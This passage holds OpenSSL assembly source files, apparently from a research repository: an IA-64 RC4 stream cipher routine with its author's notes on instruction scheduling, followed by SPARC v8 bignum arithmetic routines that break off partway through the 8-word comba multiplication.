shenango/apps/parsec/pkgs/libs/ssl/src/crypto/rc4/asm/rc4-ia64.S
|
// ====================================================================
// Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
// project.
//
// Rights for redistribution and usage in source and binary forms are
// granted according to the OpenSSL license. Warranty of any kind is
// disclaimed.
// ====================================================================
.ident "rc4-ia64.S, Version 2.0"
.ident "IA-64 ISA artwork by Andy Polyakov <appro@fy.chalmers.se>"
// What's wrong with compiler generated code? Because of the nature of
// C language, compiler doesn't [dare to] reorder load and stores. But
// being memory-bound, RC4 should benefit from reorder [on in-order-
// execution core such as IA-64]. But what can we reorder? At the very
// least we can safely reorder references to key schedule in respect
// to input and output streams. Secondly, from the first [close] glance
// it appeared that it's possible to pull up some references to
// elements of the key schedule itself. Original rationale ["prior
// loads are not safe only for "degenerated" key schedule, when some
// elements equal to the same value"] was kind of sloppy. I should have
// formulated as it really was: if we assume that pulling up reference
// to key[x+1] is not safe, then it would mean that key schedule would
// "degenerate," which is never the case. The problem is that this
// holds true in respect to references to key[x], but not to key[y].
// Legitimate "collisions" do occur within every 256^2 bytes window.
// Fortunately there're enough free instruction slots to keep prior
// reference to key[x+1], detect "collision" and compensate for it.
// All this without sacrificing a single clock cycle:-) Throughput is
// ~210MBps on 900MHz CPU, which is is >3x faster than gcc generated
// code and +30% - if compared to HP-UX C. Unrolling loop below should
// give >30% on top of that...
.text
.explicit
#if defined(_HPUX_SOURCE) && !defined(_LP64)
# define ADDP addp4
#else
# define ADDP add
#endif
#ifndef SZ
#define SZ 4 // this is set to sizeof(RC4_INT)
#endif
// SZ==4 seems to be optimal. At least SZ==8 is not any faster, not for
// assembler implementation, while SZ==1 code is ~30% slower.
#if SZ==1 // RC4_INT is unsigned char
# define LDKEY ld1
# define STKEY st1
# define OFF 0
#elif SZ==4 // RC4_INT is unsigned int
# define LDKEY ld4
# define STKEY st4
# define OFF 2
#elif SZ==8 // RC4_INT is unsigned long
# define LDKEY ld8
# define STKEY st8
# define OFF 3
#endif
out=r8; // [expanded] output pointer
inp=r9; // [expanded] output pointer
prsave=r10;
key=r28; // [expanded] pointer to RC4_KEY
ksch=r29; // (key->data+255)[&~(sizeof(key->data)-1)]
xx=r30;
yy=r31;
// void RC4(RC4_KEY *key,size_t len,const void *inp,void *out);
// void RC4(RC4_KEY *key /*in0*/, size_t len /*in1*/,
//          const void *inp /*in2*/, void *out /*in3*/)
// Software-pipelined (rotating-register) RC4 stream cipher for IA-64;
// see the scheduling discussion in the comments above and inside .Ltop.
.global RC4#
.proc RC4#
.align 32
.skip 16
RC4:
.prologue
.save ar.pfs,r2
{ .mii; alloc r2=ar.pfs,4,12,0,16
.save pr,prsave
mov prsave=pr
ADDP key=0,in0 };;
{ .mib; cmp.eq p6,p0=0,in1 // len==0?
.save ar.lc,r3
mov r3=ar.lc
(p6) br.ret.spnt.many b0 };; // emergency exit
.body
.rotr dat[4],key_x[4],tx[2],rnd[2],key_y[2],ty[1];
{ .mib; LDKEY xx=[key],SZ // load key->x
add in1=-1,in1 // adjust len for loop counter
nop.b 0 }
{ .mib; ADDP inp=0,in2
ADDP out=0,in3
brp.loop.imp .Ltop,.Lexit-16 };;
{ .mmi; LDKEY yy=[key] // load key->y
add ksch=SZ,key // ksch = &key->data[0]
mov ar.lc=in1 }
{ .mmi; mov key_y[1]=r0 // guarantee inequality
// in first iteration
add xx=1,xx
mov pr.rot=1<<16 };;
{ .mii; nop.m 0
dep key_x[1]=xx,r0,OFF,8 // (xx&255)<<OFF, scaled index
mov ar.ec=3 };; // note that epilogue counter
// is off by 1. I compensate
// for this at exit...
.Ltop:
// The loop is scheduled for 4*(n+2) spin-rate on Itanium 2, which
// theoretically gives asymptotic performance of clock frequency
// divided by 4 bytes per seconds, or 400MBps on 1.6GHz CPU. This is
// for sizeof(RC4_INT)==4. For smaller RC4_INT STKEY inadvertently
// splits the last bundle and you end up with 5*n spin-rate:-(
// Originally the loop was scheduled for 3*n and relied on key
// schedule to be aligned at 256*sizeof(RC4_INT) boundary. But
// *(out++)=dat, which maps to st1, had same effect [inadvertent
// bundle split] and holded the loop back. Rescheduling for 4*n
// made it possible to eliminate dependence on specific alignment
// and allow OpenSSH keep "abusing" our API. Reaching for 3*n would
// require unrolling, sticking to variable shift instruction for
// collecting output [to avoid starvation for integer shifter] and
// copying of key schedule to controlled place in stack [so that
// deposit instruction can serve as substitute for whole
// key->data+((x&255)<<log2(sizeof(key->data[0])))]...
{ .mmi; (p19) st1 [out]=dat[3],1 // *(out++)=dat
(p16) add xx=1,xx // x++
(p18) dep rnd[1]=rnd[1],r0,OFF,8 } // ((tx+ty)&255)<<OFF
{ .mmi; (p16) add key_x[1]=ksch,key_x[1] // &key[xx&255]
(p17) add key_y[1]=ksch,key_y[1] };; // &key[yy&255]
{ .mmi; (p16) LDKEY tx[0]=[key_x[1]] // tx=key[xx]
(p17) LDKEY ty[0]=[key_y[1]] // ty=key[yy]
(p16) dep key_x[0]=xx,r0,OFF,8 } // (xx&255)<<OFF
{ .mmi; (p18) add rnd[1]=ksch,rnd[1] // &key[(tx+ty)&255]
(p16) cmp.ne.unc p20,p21=key_x[1],key_y[1] };;
{ .mmi; (p18) LDKEY rnd[1]=[rnd[1]] // rnd=key[(tx+ty)&255]
(p16) ld1 dat[0]=[inp],1 } // dat=*(inp++)
.pred.rel "mutex",p20,p21
{ .mmi; (p21) add yy=yy,tx[1] // (p16)
(p20) add yy=yy,tx[0] // (p16) y+=tx
(p21) mov tx[0]=tx[1] };; // (p16)
{ .mmi; (p17) STKEY [key_y[1]]=tx[1] // key[yy]=tx
(p17) STKEY [key_x[2]]=ty[0] // key[xx]=ty
(p16) dep key_y[0]=yy,r0,OFF,8 } // &key[yy&255]
{ .mmb; (p17) add rnd[0]=tx[1],ty[0] // tx+=ty
(p18) xor dat[2]=dat[2],rnd[1] // dat^=rnd
br.ctop.sptk .Ltop };;
.Lexit:
{ .mib; STKEY [key]=yy,-SZ // save key->y
mov pr=prsave,0x1ffff
nop.b 0 }
{ .mib; st1 [out]=dat[3],1 // compensate for truncated
// epilogue counter
add xx=-1,xx
nop.b 0 };;
{ .mib; STKEY [key]=xx // save key->x
mov ar.lc=r3
br.ret.sptk.many b0 };;
.endp RC4#
|
AIFM-sys/AIFM
| 28,245
|
shenango/apps/parsec/pkgs/libs/ssl/src/crypto/bn/asm/sparcv8.S
|
.ident "sparcv8.s, Version 1.4"
.ident "SPARC v8 ISA artwork by Andy Polyakov <appro@fy.chalmers.se>"
/*
* ====================================================================
* Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
* project.
*
* Rights for redistribution and usage in source and binary forms are
* granted according to the OpenSSL license. Warranty of any kind is
* disclaimed.
* ====================================================================
*/
/*
* This is my modest contributon to OpenSSL project (see
* http://www.openssl.org/ for more information about it) and is
* a drop-in SuperSPARC ISA replacement for crypto/bn/bn_asm.c
* module. For updates see http://fy.chalmers.se/~appro/hpe/.
*
* See bn_asm.sparc.v8plus.S for more details.
*/
/*
* Revision history.
*
* 1.1 - new loop unrolling model(*);
* 1.2 - made gas friendly;
* 1.3 - fixed problem with /usr/ccs/lib/cpp;
* 1.4 - some retunes;
*
* (*) see bn_asm.sparc.v8plus.S for details
*/
.section ".text",#alloc,#execinstr
.file "bn_asm.sparc.v8.S"
.align 32
.global bn_mul_add_words
/*
* BN_ULONG bn_mul_add_words(rp,ap,num,w)
* BN_ULONG *rp,*ap;
* int num;
* BN_ULONG w;
*/
! BN_ULONG bn_mul_add_words(BN_ULONG *rp /*%o0*/, const BN_ULONG *ap /*%o1*/,
!                           int num /*%o2*/, BN_ULONG w /*%o3*/)
! rp[i] += ap[i]*w for i in [0,num); returns the final carry word (%o5).
! Main loop handles 4 words per iteration; tail handles the remainder.
! 32x32->64 multiply via umul + rd %y (high half in %y).
bn_mul_add_words:
cmp %o2,0
bg,a .L_bn_mul_add_words_proceed
ld [%o1],%g2 ! annulled delay slot: prefetch ap[0]
retl
clr %o0 ! num<=0: return 0
.L_bn_mul_add_words_proceed:
andcc %o2,-4,%g0
bz .L_bn_mul_add_words_tail
clr %o5 ! carry = 0
! 4-word unrolled loop; %o5 carries between words.
.L_bn_mul_add_words_loop:
ld [%o0],%o4
ld [%o1+4],%g3
umul %o3,%g2,%g2 ! low half of ap[i]*w
rd %y,%g1 ! high half
addcc %o4,%o5,%o4 ! rp[i] + carry
addx %g1,0,%g1
addcc %o4,%g2,%o4 ! + product low
st %o4,[%o0]
addx %g1,0,%o5 ! next carry
ld [%o0+4],%o4
ld [%o1+8],%g2
umul %o3,%g3,%g3
dec 4,%o2
rd %y,%g1
addcc %o4,%o5,%o4
addx %g1,0,%g1
addcc %o4,%g3,%o4
st %o4,[%o0+4]
addx %g1,0,%o5
ld [%o0+8],%o4
ld [%o1+12],%g3
umul %o3,%g2,%g2
inc 16,%o1
rd %y,%g1
addcc %o4,%o5,%o4
addx %g1,0,%g1
addcc %o4,%g2,%o4
st %o4,[%o0+8]
addx %g1,0,%o5
ld [%o0+12],%o4
umul %o3,%g3,%g3
inc 16,%o0
rd %y,%g1
addcc %o4,%o5,%o4
addx %g1,0,%g1
addcc %o4,%g3,%o4
st %o4,[%o0-4]
addx %g1,0,%o5
andcc %o2,-4,%g0
bnz,a .L_bn_mul_add_words_loop
ld [%o1],%g2
tst %o2
bnz,a .L_bn_mul_add_words_tail
ld [%o1],%g2
.L_bn_mul_add_words_return:
retl
mov %o5,%o0 ! return carry
nop
! Tail: up to 3 remaining words, same add-with-carry pattern.
.L_bn_mul_add_words_tail:
ld [%o0],%o4
umul %o3,%g2,%g2
addcc %o4,%o5,%o4
rd %y,%g1
addx %g1,0,%g1
addcc %o4,%g2,%o4
addx %g1,0,%o5
deccc %o2
bz .L_bn_mul_add_words_return
st %o4,[%o0]
ld [%o1+4],%g2
ld [%o0+4],%o4
umul %o3,%g2,%g2
rd %y,%g1
addcc %o4,%o5,%o4
addx %g1,0,%g1
addcc %o4,%g2,%o4
addx %g1,0,%o5
deccc %o2
bz .L_bn_mul_add_words_return
st %o4,[%o0+4]
ld [%o1+8],%g2
ld [%o0+8],%o4
umul %o3,%g2,%g2
rd %y,%g1
addcc %o4,%o5,%o4
addx %g1,0,%g1
addcc %o4,%g2,%o4
st %o4,[%o0+8]
retl
addx %g1,0,%o0 ! return carry (delay slot)
.type bn_mul_add_words,#function
.size bn_mul_add_words,(.-bn_mul_add_words)
.align 32
.global bn_mul_words
/*
* BN_ULONG bn_mul_words(rp,ap,num,w)
* BN_ULONG *rp,*ap;
* int num;
* BN_ULONG w;
*/
! BN_ULONG bn_mul_words(BN_ULONG *rp /*%o0*/, const BN_ULONG *ap /*%o1*/,
!                       int num /*%o2*/, BN_ULONG w /*%o3*/)
! rp[i] = ap[i]*w (plus propagated carry); returns the final carry (%o5).
! Same unroll-by-4 structure as bn_mul_add_words, without the rp[] add.
bn_mul_words:
cmp %o2,0
bg,a .L_bn_mul_words_proceeed
ld [%o1],%g2 ! annulled delay slot: prefetch ap[0]
retl
clr %o0 ! num<=0: return 0
.L_bn_mul_words_proceeed:
andcc %o2,-4,%g0
bz .L_bn_mul_words_tail
clr %o5 ! carry = 0
.L_bn_mul_words_loop:
ld [%o1+4],%g3
umul %o3,%g2,%g2 ! low half of ap[i]*w
addcc %g2,%o5,%g2 ! + carry
rd %y,%g1 ! high half
addx %g1,0,%o5 ! next carry
st %g2,[%o0]
ld [%o1+8],%g2
umul %o3,%g3,%g3
addcc %g3,%o5,%g3
rd %y,%g1
dec 4,%o2
addx %g1,0,%o5
st %g3,[%o0+4]
ld [%o1+12],%g3
umul %o3,%g2,%g2
addcc %g2,%o5,%g2
rd %y,%g1
inc 16,%o1
st %g2,[%o0+8]
addx %g1,0,%o5
umul %o3,%g3,%g3
addcc %g3,%o5,%g3
rd %y,%g1
inc 16,%o0
addx %g1,0,%o5
st %g3,[%o0-4]
andcc %o2,-4,%g0
nop
bnz,a .L_bn_mul_words_loop
ld [%o1],%g2
tst %o2
bnz,a .L_bn_mul_words_tail
ld [%o1],%g2
.L_bn_mul_words_return:
retl
mov %o5,%o0 ! return carry
nop
! Tail: up to 3 remaining words.
.L_bn_mul_words_tail:
umul %o3,%g2,%g2
addcc %g2,%o5,%g2
rd %y,%g1
addx %g1,0,%o5
deccc %o2
bz .L_bn_mul_words_return
st %g2,[%o0]
nop
ld [%o1+4],%g2
umul %o3,%g2,%g2
addcc %g2,%o5,%g2
rd %y,%g1
addx %g1,0,%o5
deccc %o2
bz .L_bn_mul_words_return
st %g2,[%o0+4]
ld [%o1+8],%g2
umul %o3,%g2,%g2
addcc %g2,%o5,%g2
rd %y,%g1
st %g2,[%o0+8]
retl
addx %g1,0,%o0 ! return carry (delay slot)
.type bn_mul_words,#function
.size bn_mul_words,(.-bn_mul_words)
.align 32
.global bn_sqr_words
/*
* void bn_sqr_words(r,a,n)
* BN_ULONG *r,*a;
* int n;
*/
! void bn_sqr_words(BN_ULONG *r /*%o0*/, const BN_ULONG *a /*%o1*/,
!                   int n /*%o2*/)
! r[2i] / r[2i+1] = low/high halves of a[i]^2; no carries between words.
! Unrolled by 4 input words (8 output words) with a 3-word tail.
bn_sqr_words:
cmp %o2,0
bg,a .L_bn_sqr_words_proceeed
ld [%o1],%g2 ! annulled delay slot: prefetch a[0]
retl
clr %o0 ! n<=0: nothing to do
.L_bn_sqr_words_proceeed:
andcc %o2,-4,%g0
bz .L_bn_sqr_words_tail
clr %o5
.L_bn_sqr_words_loop:
ld [%o1+4],%g3
umul %g2,%g2,%o4 ! low half of a[i]^2
st %o4,[%o0]
rd %y,%o5 ! high half
st %o5,[%o0+4]
ld [%o1+8],%g2
umul %g3,%g3,%o4
dec 4,%o2
st %o4,[%o0+8]
rd %y,%o5
st %o5,[%o0+12]
nop
ld [%o1+12],%g3
umul %g2,%g2,%o4
st %o4,[%o0+16]
rd %y,%o5
inc 16,%o1
st %o5,[%o0+20]
umul %g3,%g3,%o4
inc 32,%o0 ! output advances twice as fast as input
st %o4,[%o0-8]
rd %y,%o5
st %o5,[%o0-4]
andcc %o2,-4,%g2
bnz,a .L_bn_sqr_words_loop
ld [%o1],%g2
tst %o2
nop
bnz,a .L_bn_sqr_words_tail
ld [%o1],%g2
.L_bn_sqr_words_return:
retl
clr %o0
! Tail: up to 3 remaining words.
.L_bn_sqr_words_tail:
umul %g2,%g2,%o4
st %o4,[%o0]
deccc %o2
rd %y,%o5
bz .L_bn_sqr_words_return
st %o5,[%o0+4]
ld [%o1+4],%g2
umul %g2,%g2,%o4
st %o4,[%o0+8]
deccc %o2
rd %y,%o5
nop
bz .L_bn_sqr_words_return
st %o5,[%o0+12]
ld [%o1+8],%g2
umul %g2,%g2,%o4
st %o4,[%o0+16]
rd %y,%o5
st %o5,[%o0+20]
retl
clr %o0
.type bn_sqr_words,#function
.size bn_sqr_words,(.-bn_sqr_words)
.align 32
.global bn_div_words
/*
* BN_ULONG bn_div_words(h,l,d)
* BN_ULONG h,l,d;
*/
! BN_ULONG bn_div_words(BN_ULONG h /*%o0*/, BN_ULONG l /*%o1*/,
!                       BN_ULONG d /*%o2*/)
! 64-by-32 divide: returns (h:l)/d using the %y register as the
! high word for udiv.
bn_div_words:
wr %o0,%y ! %y:%o1 forms the 64-bit dividend
udiv %o1,%o2,%o0
retl
nop
.type bn_div_words,#function
.size bn_div_words,(.-bn_div_words)
.align 32
.global bn_add_words
/*
* BN_ULONG bn_add_words(rp,ap,bp,n)
* BN_ULONG *rp,*ap,*bp;
* int n;
*/
! BN_ULONG bn_add_words(BN_ULONG *rp /*%o0*/, const BN_ULONG *ap /*%o1*/,
!                       const BN_ULONG *bp /*%o2*/, int n /*%o3*/)
! rp[] = ap[] + bp[] with carry propagation; returns the final carry (%g1).
! The carry is kept live across iterations by re-arming the CPU carry
! flag with "addcc %g1,-1,%g0" at the top of each pass.
bn_add_words:
cmp %o3,0
bg,a .L_bn_add_words_proceed
ld [%o1],%o4 ! annulled delay slot: prefetch ap[0]
retl
clr %o0 ! n<=0: return 0
.L_bn_add_words_proceed:
andcc %o3,-4,%g0
bz .L_bn_add_words_tail
clr %g1 ! carry = 0
ba .L_bn_add_words_warn_loop
addcc %g0,0,%g0 ! clear carry flag
.L_bn_add_words_loop:
ld [%o1],%o4
.L_bn_add_words_warn_loop:
ld [%o2],%o5
ld [%o1+4],%g3
ld [%o2+4],%g4
dec 4,%o3
addxcc %o5,%o4,%o5 ! word 0, add with carry
st %o5,[%o0]
ld [%o1+8],%o4
ld [%o2+8],%o5
inc 16,%o1
addxcc %g3,%g4,%g3 ! word 1
st %g3,[%o0+4]
ld [%o1-4],%g3
ld [%o2+12],%g4
inc 16,%o2
addxcc %o5,%o4,%o5 ! word 2
st %o5,[%o0+8]
inc 16,%o0
addxcc %g3,%g4,%g3 ! word 3
st %g3,[%o0-4]
addx %g0,0,%g1 ! capture carry into %g1
andcc %o3,-4,%g0
bnz,a .L_bn_add_words_loop
addcc %g1,-1,%g0 ! re-arm carry flag from %g1
tst %o3
bnz,a .L_bn_add_words_tail
ld [%o1],%o4
.L_bn_add_words_return:
retl
mov %g1,%o0 ! return carry
! Tail: up to 3 remaining words.
.L_bn_add_words_tail:
addcc %g1,-1,%g0 ! re-arm carry flag
ld [%o2],%o5
addxcc %o5,%o4,%o5
addx %g0,0,%g1
deccc %o3
bz .L_bn_add_words_return
st %o5,[%o0]
ld [%o1+4],%o4
addcc %g1,-1,%g0
ld [%o2+4],%o5
addxcc %o5,%o4,%o5
addx %g0,0,%g1
deccc %o3
bz .L_bn_add_words_return
st %o5,[%o0+4]
ld [%o1+8],%o4
addcc %g1,-1,%g0
ld [%o2+8],%o5
addxcc %o5,%o4,%o5
st %o5,[%o0+8]
retl
addx %g0,0,%o0 ! return carry (delay slot)
.type bn_add_words,#function
.size bn_add_words,(.-bn_add_words)
.align 32
.global bn_sub_words
/*
* BN_ULONG bn_sub_words(rp,ap,bp,n)
* BN_ULONG *rp,*ap,*bp;
* int n;
*/
! BN_ULONG bn_sub_words(BN_ULONG *rp /*%o0*/, const BN_ULONG *ap /*%o1*/,
!                       const BN_ULONG *bp /*%o2*/, int n /*%o3*/)
! rp[] = ap[] - bp[] with borrow propagation; returns the final
! borrow (%g1).  Mirror image of bn_add_words using subxcc.
bn_sub_words:
cmp %o3,0
bg,a .L_bn_sub_words_proceed
ld [%o1],%o4 ! annulled delay slot: prefetch ap[0]
retl
clr %o0 ! n<=0: return 0
.L_bn_sub_words_proceed:
andcc %o3,-4,%g0
bz .L_bn_sub_words_tail
clr %g1 ! borrow = 0
ba .L_bn_sub_words_warm_loop
addcc %g0,0,%g0 ! clear carry flag
.L_bn_sub_words_loop:
ld [%o1],%o4
.L_bn_sub_words_warm_loop:
ld [%o2],%o5
ld [%o1+4],%g3
ld [%o2+4],%g4
dec 4,%o3
subxcc %o4,%o5,%o5 ! word 0, subtract with borrow
st %o5,[%o0]
ld [%o1+8],%o4
ld [%o2+8],%o5
inc 16,%o1
subxcc %g3,%g4,%g4 ! word 1
st %g4,[%o0+4]
ld [%o1-4],%g3
ld [%o2+12],%g4
inc 16,%o2
subxcc %o4,%o5,%o5 ! word 2
st %o5,[%o0+8]
inc 16,%o0
subxcc %g3,%g4,%g4 ! word 3
st %g4,[%o0-4]
addx %g0,0,%g1 ! capture borrow into %g1
andcc %o3,-4,%g0
bnz,a .L_bn_sub_words_loop
addcc %g1,-1,%g0 ! re-arm borrow flag from %g1
tst %o3
nop
bnz,a .L_bn_sub_words_tail
ld [%o1],%o4
.L_bn_sub_words_return:
retl
mov %g1,%o0 ! return borrow
! Tail: up to 3 remaining words.
.L_bn_sub_words_tail:
addcc %g1,-1,%g0 ! re-arm borrow flag
ld [%o2],%o5
subxcc %o4,%o5,%o5
addx %g0,0,%g1
deccc %o3
bz .L_bn_sub_words_return
st %o5,[%o0]
nop
ld [%o1+4],%o4
addcc %g1,-1,%g0
ld [%o2+4],%o5
subxcc %o4,%o5,%o5
addx %g0,0,%g1
deccc %o3
bz .L_bn_sub_words_return
st %o5,[%o0+4]
ld [%o1+8],%o4
addcc %g1,-1,%g0
ld [%o2+8],%o5
subxcc %o4,%o5,%o5
st %o5,[%o0+8]
retl
addx %g0,0,%o0 ! return borrow (delay slot)
.type bn_sub_words,#function
.size bn_sub_words,(.-bn_sub_words)
#define FRAME_SIZE -96
/* minimal SPARC V8 frame (negative: "save" decrements %sp) */
/*
 * Here is register usage map for *all* routines below.
 */
/* t_1:t_2 hold one 32x32->64 umul product: t_1 is the low word
 * produced by umul, t_2 the high word read back from %y.
 * c_1/c_2/c_3 rotate as the three-word running column sum of the
 * comba multiply/square routines. */
#define t_1 %o0
#define t_2 %o1
#define c_1 %o2
#define c_2 %o3
#define c_3 %o4
/* word I of the a, b and r arrays (after "save": %i0=r, %i1=a, %i2=b) */
#define ap(I) [%i1+4*I]
#define bp(I) [%i2+4*I]
#define rp(I) [%i0+4*I]
/* cached a[0..7] in the local registers */
#define a_0 %l0
#define a_1 %l1
#define a_2 %l2
#define a_3 %l3
#define a_4 %l4
#define a_5 %l5
#define a_6 %l6
#define a_7 %l7
/* cached b[0..7] in the remaining in/out/global scratch registers */
#define b_0 %i3
#define b_1 %i4
#define b_2 %i5
#define b_3 %o5
#define b_4 %g1
#define b_5 %g2
#define b_6 %g3
#define b_7 %g4
.align 32
.global bn_mul_comba8
/*
 * void bn_mul_comba8(r,a,b)
 * BN_ULONG *r,*a,*b;
 *
 * 8x8-word comba multiplication: r[0..15] = a[0..7] * b[0..7].
 * Each result word r[k] is formed by accumulating all products
 * a[i]*b[j] with i+j==k into the rotating three-word accumulator
 * c_1/c_2/c_3 (sum, carry, carry-of-carry).  Loads of a[]/b[] are
 * interleaved with the arithmetic; the "!=" comment markers
 * apparently tag instruction groups as a scheduling aid.
 */
bn_mul_comba8:
save %sp,FRAME_SIZE,%sp
ld ap(0),a_0
ld bp(0),b_0
umul a_0,b_0,c_1 !=!mul_add_c(a[0],b[0],c1,c2,c3);
ld bp(1),b_1
rd %y,c_2
st c_1,rp(0) !r[0]=c1;
umul a_0,b_1,t_1 !=!mul_add_c(a[0],b[1],c2,c3,c1);
ld ap(1),a_1
addcc c_2,t_1,c_2
rd %y,t_2
addxcc %g0,t_2,c_3 !=
addx %g0,%g0,c_1
ld ap(2),a_2
umul a_1,b_0,t_1 !mul_add_c(a[1],b[0],c2,c3,c1);
addcc c_2,t_1,c_2 !=
rd %y,t_2
addxcc c_3,t_2,c_3
st c_2,rp(1) !r[1]=c2;
addx c_1,%g0,c_1 !=
umul a_2,b_0,t_1 !mul_add_c(a[2],b[0],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1 !=
addx %g0,%g0,c_2
ld bp(2),b_2
umul a_1,b_1,t_1 !mul_add_c(a[1],b[1],c3,c1,c2);
addcc c_3,t_1,c_3 !=
rd %y,t_2
addxcc c_1,t_2,c_1
ld bp(3),b_3
addx c_2,%g0,c_2 !=
umul a_0,b_2,t_1 !mul_add_c(a[0],b[2],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1 !=
addx c_2,%g0,c_2
st c_3,rp(2) !r[2]=c3;
umul a_0,b_3,t_1 !mul_add_c(a[0],b[3],c1,c2,c3);
addcc c_1,t_1,c_1 !=
rd %y,t_2
addxcc c_2,t_2,c_2
addx %g0,%g0,c_3
umul a_1,b_2,t_1 !=!mul_add_c(a[1],b[2],c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3 !=
ld ap(3),a_3
umul a_2,b_1,t_1 !mul_add_c(a[2],b[1],c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2 !=
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3
ld ap(4),a_4
umul a_3,b_0,t_1 !mul_add_c(a[3],b[0],c1,c2,c3);!=
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3 !=
st c_1,rp(3) !r[3]=c1;
umul a_4,b_0,t_1 !mul_add_c(a[4],b[0],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx %g0,%g0,c_1
umul a_3,b_1,t_1 !mul_add_c(a[3],b[1],c2,c3,c1);
addcc c_2,t_1,c_2 !=
rd %y,t_2
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1
umul a_2,b_2,t_1 !=!mul_add_c(a[2],b[2],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1 !=
ld bp(4),b_4
umul a_1,b_3,t_1 !mul_add_c(a[1],b[3],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1
ld bp(5),b_5
umul a_0,b_4,t_1 !=!mul_add_c(a[0],b[4],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1 !=
st c_2,rp(4) !r[4]=c2;
umul a_0,b_5,t_1 !mul_add_c(a[0],b[5],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2 !=
addxcc c_1,t_2,c_1
addx %g0,%g0,c_2
umul a_1,b_4,t_1 !mul_add_c(a[1],b[4],c3,c1,c2);
addcc c_3,t_1,c_3 !=
rd %y,t_2
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2
umul a_2,b_3,t_1 !=!mul_add_c(a[2],b[3],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2 !=
umul a_3,b_2,t_1 !mul_add_c(a[3],b[2],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1 !=
addx c_2,%g0,c_2
ld ap(5),a_5
umul a_4,b_1,t_1 !mul_add_c(a[4],b[1],c3,c1,c2);
addcc c_3,t_1,c_3 !=
rd %y,t_2
addxcc c_1,t_2,c_1
ld ap(6),a_6
addx c_2,%g0,c_2 !=
umul a_5,b_0,t_1 !mul_add_c(a[5],b[0],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1 !=
addx c_2,%g0,c_2
st c_3,rp(5) !r[5]=c3;
umul a_6,b_0,t_1 !mul_add_c(a[6],b[0],c1,c2,c3);
addcc c_1,t_1,c_1 !=
rd %y,t_2
addxcc c_2,t_2,c_2
addx %g0,%g0,c_3
umul a_5,b_1,t_1 !=!mul_add_c(a[5],b[1],c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3 !=
umul a_4,b_2,t_1 !mul_add_c(a[4],b[2],c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2 !=
addx c_3,%g0,c_3
umul a_3,b_3,t_1 !mul_add_c(a[3],b[3],c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2 !=
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3
umul a_2,b_4,t_1 !mul_add_c(a[2],b[4],c1,c2,c3);
addcc c_1,t_1,c_1 !=
rd %y,t_2
addxcc c_2,t_2,c_2
ld bp(6),b_6
addx c_3,%g0,c_3 !=
umul a_1,b_5,t_1 !mul_add_c(a[1],b[5],c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2 !=
addx c_3,%g0,c_3
ld bp(7),b_7
umul a_0,b_6,t_1 !mul_add_c(a[0],b[6],c1,c2,c3);
addcc c_1,t_1,c_1 !=
rd %y,t_2
addxcc c_2,t_2,c_2
st c_1,rp(6) !r[6]=c1;
addx c_3,%g0,c_3 !=
umul a_0,b_7,t_1 !mul_add_c(a[0],b[7],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2
addxcc c_3,t_2,c_3 !=
addx %g0,%g0,c_1
umul a_1,b_6,t_1 !mul_add_c(a[1],b[6],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1
umul a_2,b_5,t_1 !mul_add_c(a[2],b[5],c2,c3,c1);
addcc c_2,t_1,c_2 !=
rd %y,t_2
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1
umul a_3,b_4,t_1 !=!mul_add_c(a[3],b[4],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1 !=
umul a_4,b_3,t_1 !mul_add_c(a[4],b[3],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2
addxcc c_3,t_2,c_3 !=
addx c_1,%g0,c_1
umul a_5,b_2,t_1 !mul_add_c(a[5],b[2],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1
ld ap(7),a_7
umul a_6,b_1,t_1 !=!mul_add_c(a[6],b[1],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1 !=
umul a_7,b_0,t_1 !mul_add_c(a[7],b[0],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2
addxcc c_3,t_2,c_3 !=
addx c_1,%g0,c_1
st c_2,rp(7) !r[7]=c2;
umul a_7,b_1,t_1 !mul_add_c(a[7],b[1],c3,c1,c2);
addcc c_3,t_1,c_3 !=
rd %y,t_2
addxcc c_1,t_2,c_1
addx %g0,%g0,c_2
umul a_6,b_2,t_1 !=!mul_add_c(a[6],b[2],c3,c1,c2);
